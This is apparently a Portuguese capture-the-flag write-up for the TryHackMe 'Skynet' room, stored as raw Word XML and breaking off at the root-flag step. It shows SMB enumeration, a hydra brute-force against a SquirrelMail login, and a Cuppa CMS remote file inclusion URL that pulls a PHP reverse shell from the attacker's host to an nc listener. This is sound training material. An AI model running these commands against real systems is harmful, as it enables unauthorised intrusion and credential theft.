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EF65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FBCC211" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00AC45F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F79900" wp14:editId="3DB55F54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DDFF1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6D34EB40" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00AC45F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231FA20" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="006A1456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Skynet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AC45F8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72556B79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D20060" w14:paraId="3CE905F4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208F69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D20060" w14:paraId="2AC7C18D" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="417"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4247" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5296283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591F097" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="006A1456" w:rsidP="006A145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Skynet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C45F8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D20060" w14:paraId="20102EEC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="422"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4247" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C58F8E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C51254A" w14:textId="5BDAEA25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D20060" w14:paraId="3E3642BD" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="412"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4247" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27E4DF90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2616A43" w14:textId="2253ADD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None</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D20060" w14:paraId="54FAFA97" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="412"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4247" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42AB218E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A3316B5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80A73">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>https://tryhackme.com/r/room/skynet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B6C4EB8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D20060" w14:paraId="08D140FC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="358"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2832" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4514B6D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6B759AE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2F8408E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D20060" w14:paraId="28328829" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="420"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2832" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5EB6BC45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36180CB" w14:textId="397F8DD8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877C7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E96BF37" w14:textId="118D50E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D20060" w14:paraId="53572207" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="426"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2832" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="359E450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13CA862B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89DFAF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0C13E22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D20060" w14:paraId="70F60B19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2079852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D20060" w14:paraId="0E0A411E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="416"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A14A76F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5680FC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432704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D20060" w14:paraId="1F9A79E6" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="408"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A70CFE6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4E486A5" w14:textId="0FE1127B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16/10/2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5664" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E0E247C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D20060" w14:paraId="129D8ABF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="428"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04431FA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E22453A" w14:textId="72F1F47A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23C689B4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D20060" w14:paraId="3F05E572" w14:textId="77777777" w:rsidTr="00EF69EC">
        <w:trPr>
          <w:trHeight w:val="390"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40E07862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E772DE0" w14:textId="28F80A90" w:rsidR="00D20060" w:rsidRDefault="00CA75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3D27E841" w14:textId="0C1B17CF" w:rsidR="00D20060" w:rsidRDefault="00CA75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Refatoração</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF69EC" w14:paraId="05C8637E" w14:textId="77777777" w:rsidTr="00EF69EC">
        <w:trPr>
          <w:trHeight w:val="390"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="704" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E73EB04" w14:textId="739D7CBC" w:rsidR="00EF69EC" w:rsidRDefault="00EF69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000BDE23" w14:textId="49FE5D07" w:rsidR="00EF69EC" w:rsidRDefault="00EF69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6255847C" w14:textId="4F8CA7E2" w:rsidR="00EF69EC" w:rsidRDefault="00EF69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2° Revisão </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60402C77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18F6BA3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C524916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0BCAB5ED" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00AC45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66630514"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="7AB1EBE8" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00AC45F8" w:rsidP="00C80A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16B426EF" w14:textId="77777777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184657D9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What is Miles password for his emails?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5DA4DC13" w14:textId="36034823" w:rsidR="00D20060" w:rsidRPr="00CA7514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2et92p0">
            <w:r w:rsidRPr="00CA7514">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>What is the hidden directory?</w:t>
            </w:r>
            <w:r w:rsidR="00AC45F8" w:rsidRPr="00CA7514">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidR="00EF69EC" w:rsidRPr="00CA7514">
            <w:rPr>
              <w:color w:val="000000"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>6</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="189BA03E" w14:textId="2E538A00" w:rsidR="00D20060" w:rsidRPr="00CA7514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tyjcwt">
            <w:r w:rsidRPr="00CA7514">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>What is the vulnerability called when you can include a remote file for malicious purposes?</w:t>
            </w:r>
            <w:r w:rsidR="00AC45F8" w:rsidRPr="00CA7514">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidR="00EF69EC" w:rsidRPr="00CA7514">
            <w:rPr>
              <w:color w:val="000000"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>7</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="255F2E1C" w14:textId="0B09FFFC" w:rsidR="00D20060" w:rsidRPr="00CA7514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hyperlink w:anchor="_heading=h.3dy6vkm">
            <w:r w:rsidRPr="00CA7514">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>What is the user flag:?</w:t>
            </w:r>
            <w:r w:rsidR="00AC45F8" w:rsidRPr="00CA7514">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidR="00EF69EC" w:rsidRPr="00CA7514">
            <w:rPr>
              <w:color w:val="000000"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>8</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4F78BBDE" w14:textId="5D312750" w:rsidR="006A1456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3877C7">
            <w:rPr>
              <w:color w:val="000000"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>What is the root flag?</w:t>
          </w:r>
          <w:r w:rsidRPr="003877C7">
            <w:rPr>
              <w:color w:val="000000"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:tab/>
          </w:r>
          <w:r w:rsidR="00EF69EC">
            <w:rPr>
              <w:color w:val="000000"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>9</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="65CC095D" w14:textId="15A7A7A6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5F902D31" w14:textId="578C29CF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3922AD08" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00AC45F8">
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="0254EBE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0EEA577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F29DDE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431B7F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6B2D2F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4B1559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2D62D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234A13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81900FD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247AD1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2C9557A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0E113A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5BB713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2F22CE2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FB0A9E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772C78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95E54C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2E60C2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E6C720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15E81A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1A0D616" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00D200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41CB7C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3127FE15" w14:textId="77777777" w:rsidR="006A1456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se trata de um desafio fácil e com um tema muito interessante (exterminador do futuro). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664B41A6" w14:textId="77777777" w:rsidR="00D20060" w:rsidRPr="003877C7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3877C7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70225BDD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Miles password for his emails?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712B0FF7" w14:textId="77777777" w:rsidR="00D20060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Sempre começando com um simples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aonde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já é possível notar que há 6 portas abertas, sendo elas 22, 80, 110,139, 143 e 445</w:t>
      </w:r>
      <w:r w:rsidR="00AC45F8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Também há uma coisa muito interessante, um serviço samba.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C10591D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  <w:r w:rsidRPr="001B1B77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3A37740B" w14:textId="77777777" w:rsidR="001B1B77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16FA8C" wp14:editId="7696AF50">
            <wp:extent cx="5200798" cy="2219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853" cy="2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0E9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</w:p>
    <w:p w14:paraId="4808FF75" w14:textId="77777777" w:rsidR="001B1B77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 2 formas de descobrir os clientes do samba, você pode tentar qualquer uma.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3D0C3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>: enum4linux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14:paraId="6D0B46B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smbmap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–H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64A5C4E8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DD083FB" wp14:editId="1363E7AA">
            <wp:extent cx="5400040" cy="562733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E90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41C595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Há 2 que é possível analisar, mas o foco agora é </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>no ”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”. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9CFCC2" w14:textId="77777777" w:rsidR="00C539C9" w:rsidRPr="003877C7" w:rsidRDefault="00C539C9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smbclient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 /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>/&lt;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ip_target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&gt;/anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27996C41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ABB1010" wp14:editId="75643590">
            <wp:extent cx="5610225" cy="59053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2" cy="5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C1EB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A4E3913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Tendo acesso, terá logo em seguida um arquivo para baixar e um diretório, aonde irá ter mais alguns arquivos para </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>download .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="65F06C8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*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5380AD6B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67C9FA" wp14:editId="48BC4E9E">
            <wp:extent cx="5400040" cy="1594105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C00F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6199BF4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os arquivos baixados, o primeiro a ser </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>analizado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será o “log1.txt”.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aonde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há uma pequena quantidade de supostas senhas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624C4A6E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outro arquivo entrega a informação do nome do alvo, porém, com os passos acima do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>write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up</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, já foi possível determinar isso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D041EB" w14:textId="77777777" w:rsidR="00C539C9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20D238" wp14:editId="352DB1D8">
            <wp:extent cx="3448050" cy="3194982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3B0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77978D11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duas informações, é necessário um diretório para realizar um ataque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Com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isso é possível. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0BC5FB" w14:textId="77777777" w:rsidR="00C80A73" w:rsidRPr="003877C7" w:rsidRDefault="00C80A73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lastRenderedPageBreak/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gobuster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dir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-w /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/share/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dirb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/wordlists/common.txt -</w:t>
      </w:r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u  http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>://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&lt;ip_target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB6EAF3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0C7CEB" wp14:editId="3B2107DB">
            <wp:extent cx="5400040" cy="31711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208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0837CA03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a análise do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foi possível acessar o “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>squirrelmail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”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email do nosso alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4D850B" w14:textId="77777777" w:rsidR="007D4C84" w:rsidRDefault="00C80A73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D373725" wp14:editId="4A4B776F">
            <wp:extent cx="5400040" cy="210857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A6D" w14:textId="77777777" w:rsidR="000E2A5E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>, o</w:t>
      </w:r>
      <w:r w:rsid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E2A5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E2A5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> vai ser </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000E2A5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>realizado  e</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000E2A5E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> também a resposta da primeira pergunta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C962DC" w14:textId="77777777" w:rsidR="00C80A73" w:rsidRPr="003877C7" w:rsidRDefault="000E2A5E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hydra -l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mile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sdyson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> -P log1.txt &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ip_target</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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&gt;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http-post-form "/squirrelmail/src/login.php:login_username=^USER^&amp;secretkey=^PASS^&amp;js_autodetect_results=1&amp;just_logged_in=</w:t>
      </w:r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1:Unknown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user or password incorrect."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E274E8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C31B3DE" wp14:editId="29CE1D9F">
            <wp:extent cx="6280005" cy="120015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12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9BC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</w:p>
    <w:p w14:paraId="613596A3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2et92p0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3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hidden directory?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE0E72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acesso ao email, e olhando eles, há um que chama muita atenção. Provavelmente sendo a senha do samba </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>client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Miles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521060EA" w14:textId="77777777" w:rsidR="007D4C84" w:rsidRDefault="007D4C84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D4C84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3532BA9" wp14:editId="08BED681">
            <wp:extent cx="5400040" cy="213667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F1E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EB09122" w14:textId="77777777" w:rsidR="000E2A5E" w:rsidRDefault="000E2A5E" w:rsidP="000E2A5E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senha estava correta, agora só dar uma olhada </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>no arquivos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 no diretório “notes”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BC9A06" w14:textId="77777777" w:rsidR="00057666" w:rsidRDefault="0005766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C37B9C1" wp14:editId="20DDDF02">
            <wp:extent cx="5400040" cy="1961318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56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3092CE3" w14:textId="77777777" w:rsidR="00E505AC" w:rsidRDefault="00E505AC" w:rsidP="000E2A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baixar o “importante.txt”</w:t>
      </w:r>
      <w:r w:rsidR="003938D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420C0191" w14:textId="77777777" w:rsidR="00E505AC" w:rsidRPr="00E505AC" w:rsidRDefault="00E505AC" w:rsidP="000E2A5E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E505AC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importante.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A4F050" w14:textId="77777777" w:rsidR="003938D9" w:rsidRDefault="00057666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AC1048C" wp14:editId="59D8713C">
            <wp:extent cx="5400040" cy="416704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8B3" w14:textId="77777777" w:rsidR="003938D9" w:rsidRPr="003938D9" w:rsidRDefault="003938D9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com a informação de um novo diretório escondido, possível entrar nele. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BA0344" w14:textId="77777777" w:rsidR="00D20060" w:rsidRDefault="00E505AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial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F7CE6BB" wp14:editId="55AC8F44">
            <wp:extent cx="4258270" cy="88594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FF0" w14:textId="77777777" w:rsidR="0005766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4" w:name="_heading=h.tyjcwt" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4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vulnerability called when you can include a remote file for malicious purposes?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1D9C2190" w14:textId="77777777" w:rsidR="003938D9" w:rsidRDefault="003938D9" w:rsidP="006A1456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 w:rsidRPr="003938D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b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Remote File </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Inclusion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09C04DB5" w14:textId="77777777" w:rsidR="003938D9" w:rsidRDefault="003938D9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 entrar no diretório escondido, não há basicamente nada aqui, apenas informações irrelevantes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3171DBAB" w14:textId="77777777" w:rsidR="00057666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800FCCB" wp14:editId="38EED076">
            <wp:extent cx="5400040" cy="21116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A76" w14:textId="77777777" w:rsidR="003938D9" w:rsidRDefault="003938D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A3ABAC" w14:textId="77777777" w:rsidR="003938D9" w:rsidRDefault="003938D9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</w:t>
      </w:r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isso, é necessário usar novamente o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,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pórem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agora com o novo diretório. Achando o </w:t>
      </w:r>
      <w:proofErr w:type="gram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“ /</w:t>
      </w:r>
      <w:proofErr w:type="gram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administrator”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FDDA98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03669">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:iCs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-w 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usr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share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dirb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wordlists</w:t>
      </w:r>
      <w:proofErr w:type="spell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/common.txt -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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u  http</w:t>
      </w:r>
      <w:proofErr w:type="gram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://&lt;ip_target&gt;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/45kra24zxs28v3yd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B7F5D3" w14:textId="77777777" w:rsidR="00D20060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3CC01B1B" wp14:editId="30DCA54A">
            <wp:extent cx="5400040" cy="1920381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7C31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0CF23CB" w14:textId="77777777" w:rsidR="00150B1D" w:rsidRDefault="00150B1D" w:rsidP="00150B1D">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0"/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Agora foi possível achar </w:t>
      </w:r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que a página está executando o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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CuppaCM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. Então utilizar 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procurar alguma falha.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759CDADD" w14:textId="77777777" w:rsidR="00150B1D" w:rsidRPr="00150B1D" w:rsidRDefault="00150B1D" w:rsidP="00150B1D"/>
    <w:p w14:paraId="1D85525D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EB579DA" w14:textId="77777777" w:rsidR="00B60B0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BBDD07E" wp14:editId="5BF4259F">
            <wp:extent cx="5400040" cy="224299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5F49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6244B1D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Então apenas falta escolher o único acessível e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baixa-lo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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096257FA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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1CD5CD64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–m php/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webapps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/25971.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51353850" w14:textId="77777777" w:rsidR="00B60B06" w:rsidRPr="0005766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0543947" wp14:editId="7A261D93">
            <wp:extent cx="5400040" cy="138331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DBE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3dy6vkm" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="7A534BFB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6896D199" w14:textId="77777777" w:rsidR="00150B1D" w:rsidRPr="003877C7" w:rsidRDefault="00150B1D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CF3BD42" w14:textId="77777777" w:rsidR="00150B1D" w:rsidRDefault="00150B1D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Lendo um pouco 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exploit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, você pode ver como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utiliza-lo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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB095A6" w14:textId="77777777" w:rsidR="00963711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Primeiro é preciso ter uma reverse shell baixada e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edita-la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</w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidR="006F73AC" w:rsidRPr="00664AA5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:spacing w:val="-1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="30"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>https://pentestmonkey.net/tools/web-shells/php-reverse-shell?ref=blog.tryhackme.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006F73AC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) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A69C0C4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Agora </w:t>
      </w:r>
      <w:r w:rsid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é preciso criar um servidor local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usando python para poder baixar a shell dentro do servidor alvo.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(Inicie dentro do diretório aonde </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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esta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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a reverse shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761519A2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Também é necessário criar um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netcat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ouvir quando a shell for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executada .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</w:p>
    <w:p w14:paraId="2285546A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 então acessar o link: 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http://&lt;ip_target&gt;</w:t>
      </w:r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/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=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http://&lt;ip_machine&gt;:8000/&lt;shell_name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70042405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python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E6D8E3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nc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lvnp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port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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581B6D15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34986DE" wp14:editId="56C7ACDE">
            <wp:extent cx="5068008" cy="6858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8B2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3F9FA8" wp14:editId="34DCD629">
            <wp:extent cx="3562847" cy="7430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4E2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710AC7A" wp14:editId="75B58608">
            <wp:extent cx="5400040" cy="98738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18C4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E1EE68E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Com uma simples navegação de diretório, é possível achar a primeira flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727F96C5" w14:textId="77777777" w:rsidR="00D46938" w:rsidRDefault="00D46938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46938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FE3C635" wp14:editId="7037CF45">
            <wp:extent cx="3391374" cy="1543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D2" w14:textId="77777777" w:rsidR="006F73AC" w:rsidRDefault="006F73AC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B6DAC81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 flag?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497F9DE4" w14:textId="77777777" w:rsidR="006F73AC" w:rsidRDefault="006F73AC" w:rsidP="00DD1392">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F73AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Dentro de 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/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F73AC">
        <w:rPr>
          <w:rStyle w:val="Forte"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>milesdyson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F73AC">
        <w:rPr>
          <w:rStyle w:val="Forte"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/backups</w:t>
      </w:r>
      <w:r w:rsidRPr="006F73AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, encontra-se um arquivo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
